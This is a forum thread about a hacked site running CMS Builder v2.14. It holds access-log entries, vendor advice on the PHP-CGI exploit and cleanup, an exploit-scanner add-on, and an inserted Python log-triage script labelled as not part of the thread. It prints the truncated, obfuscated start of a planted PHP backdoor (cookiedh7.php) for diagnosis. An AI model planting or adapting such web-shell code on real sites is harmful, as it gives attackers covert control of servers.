Builder Vulnerability
12 posts by 5 authors in: Forums > CMS Builder
Last Post: May 23, 2012
Now they are telling me there may be a vulnerability in CMSB v2.14. All my other sites are fine.
Here are the results from the log file:
83.69.233.165 - - [15/May/2012:05:15:49 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16586 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$
83.69.233.165 - - [15/May/2012:05:15:51 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16586 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$
83.69.233.165 - - [15/May/2012:05:15:53 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16651 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$
83.69.233.165 - - [15/May/2012:05:15:55 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/2010010$
75.92.255.29 - - [15/May/2012:05:16:50 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:51 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:52 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:52 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:53 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:54 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:55 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:56 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:57 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
Any ideas?
northernpenguin
Northern Penguin Technologies
"Any sufficiently advanced technology
is indistinguishable from magic."
........Arthur C. Clarke
Re: [northernpenguin] Builder Vulnerability
By Dave - May 15, 2012
The entry point was likely an old WordPress install or the recent exploit that affects PHP in CGI mode.
See the following:
http://www.php.net/archive/2012.php#id2012-05-06-1
http://www.interactivetools.com/docs/cmsbuilder/how_to_restore_hacked_sites.html
To check if your PHP is running in CGI mode go to: Admin > General Settings > Server Info (header bar) > phpinfo -or- just use this direct link: admin.php?menu=admin&action=phpinfo and then see if "Server API" says CGI
Next, if you're comfortable with the Linux command-line, you can try and grep those two IPs to see what other files they've accessed or what the entry point was.
Let me know what you find out or if we can help.
interactivetools.com
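The log search suggested in the post above, as an added example that is not part of the original thread or of CMS Builder: it filters an access log for the two IPs and reports each one's earliest request, its hits per file, and the files both IPs touched. The function names and `SAMPLE_LOG` are assumptions made for illustration; it is meant to be run on a downloaded copy of the site's access log.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Leading combined-log fields only, so lines cut off mid-user-agent still parse.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')
SUSPECT_IPS = {"83.69.233.165", "75.92.255.29"}  # the two IPs from the thread

# Sample input: four requests taken from the thread's log excerpt, plus one
# constructed line from an unrelated visitor (203.0.113.7 is a documentation IP).
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2012:05:14:02 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
83.69.233.165 - - [15/May/2012:05:15:49 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16586 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$
83.69.233.165 - - [15/May/2012:05:15:55 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/2010010$
75.92.255.29 - - [15/May/2012:05:16:50 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
75.92.255.29 - - [15/May/2012:05:16:51 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"
"""

def parse(line):
    """Return (ip, timestamp, method, path, status), or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def triage(log_text, suspect_ips=SUSPECT_IPS):
    """Per suspect IP: earliest request seen and hit count per (method, path)."""
    report = {}
    for rec in filter(None, map(parse, log_text.splitlines())):
        ip, ts, method, path, _ = rec
        if ip not in suspect_ips:
            continue
        entry = report.setdefault(ip, {"first": rec, "hits": Counter()})
        if ts < entry["first"][1]:
            entry["first"] = rec
        entry["hits"][(method, path)] += 1
    return report

def shared_paths(report):
    """Paths requested by more than one suspect IP; check these files on disk."""
    seen = defaultdict(set)
    for ip, entry in report.items():
        for _, path in entry["hits"]:
            seen[path].add(ip)
    return sorted(p for p, ips in seen.items() if len(ips) > 1)

if __name__ == "__main__":
    print(shared_paths(triage(SAMPLE_LOG)))
```

On the excerpt posted in the thread, the earliest request from 83.69.233.165 is to /mt21313196n.php, a file the thread does not otherwise mention, so it belongs on the list of files to inspect alongside cookiedh7.php.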
Re: [Dave] Builder Vulnerability
By northernpenguin - May 15, 2012 - edited: May 15, 2012
I am using cPanel, but have no access to the Linux/Unix command line.
They also accessed .htaccess (left it blank) and added some code to index.php
northernpenguin
Re: [Dave] Builder Vulnerability
cookiedh7.php
<?php
error_reporting(0); if (count($_POST) != 2) { die(PHP_OS . "10+" . md5(0987654321)); } $veb65c0b0 = array_keys($_POST); if ($veb65c0b0[0][0] == 'l') { $vd56b6998 = $ve>
I’m almost positive it is an app within /builder/ causing this. I’ve noticed some left over files for tiny_mce, which is known to be vulnerable.
northernpenguin
Re: [northernpenguin] Builder Vulnerability
By Dave - May 16, 2012
Yea I suggest removing any hacked code or files, then ask your host if anyone else was hacked or they were vulnerable to that recent PHP issue.
Then you just need to go through the site and remove all the hacked bits. If that process ends up taking too long our new exploit scanner script can help detect infected files.
There shouldn't be anything vulnerable in any of the files that came with CMSB. In every case we've seen so far it's been something else.
interactivetools.com
Re: [Dave] Builder Vulnerability
I have to start checking my 20 other sites also now. What's the chance I can get your exploit scanner script?
Thanx for the help!
Ragi
northernpenguin
Re: [northernpenguin] Builder Vulnerability
By Damon - May 17, 2012
Here is a link to the Exploit Scanner in the Add Ons:
http://www.interactivetools.com/add-ons/detail.php?Exploit-Scanner-1063
This application runs standalone and does not require a CMS Builder installation to be used. Just put it in the root and then go to it in the browser and it will scan all the folders and files on the site, then create a report.
It includes a 90 day money back guarantee so try it out.
And of course, as always, let us know if you have any questions. :)
Damon Edis - interactivetools.com
Hire me! Save time by getting our experts to help with your project.
http://www.interactivetools.com/consulting/
Re: [Damon] Builder Vulnerability
By gkornbluth - May 23, 2012 - edited: May 23, 2012
The Exploit scanner sounds like a great plugin.
Especially if new exploit schemes are added to the scanner as you discover them.
Thanks for creating this.
Jerry Kornbluth
Take advantage of a free 3 month trial subscription, only for CMSB users, at: http://www.thecmsbcookbook.com/trial.php
Re: [gkornbluth] Builder Vulnerability
By ross - May 23, 2012
Thanks for posting! I agree with you on the plugin too! It's great :). The plan is definitely to keep it up to date. Input from the community on new exploits is also welcomed :).
Cheers,
Ross Fairbairn - Consulting
consulting@interactivetools.com
Hire me! Save time by getting our experts to help with your project.
Template changes, advanced features, full integration, whatever you
need. Whether you need one hour or fifty, get it done fast with
Priority Consulting: http://www.interactivetools.com/consulting/
Re: [ross] Builder Vulnerability
By gkornbluth - May 23, 2012
This one's a definite must have.
Any reason it can't be launched by a cron job?
Jerry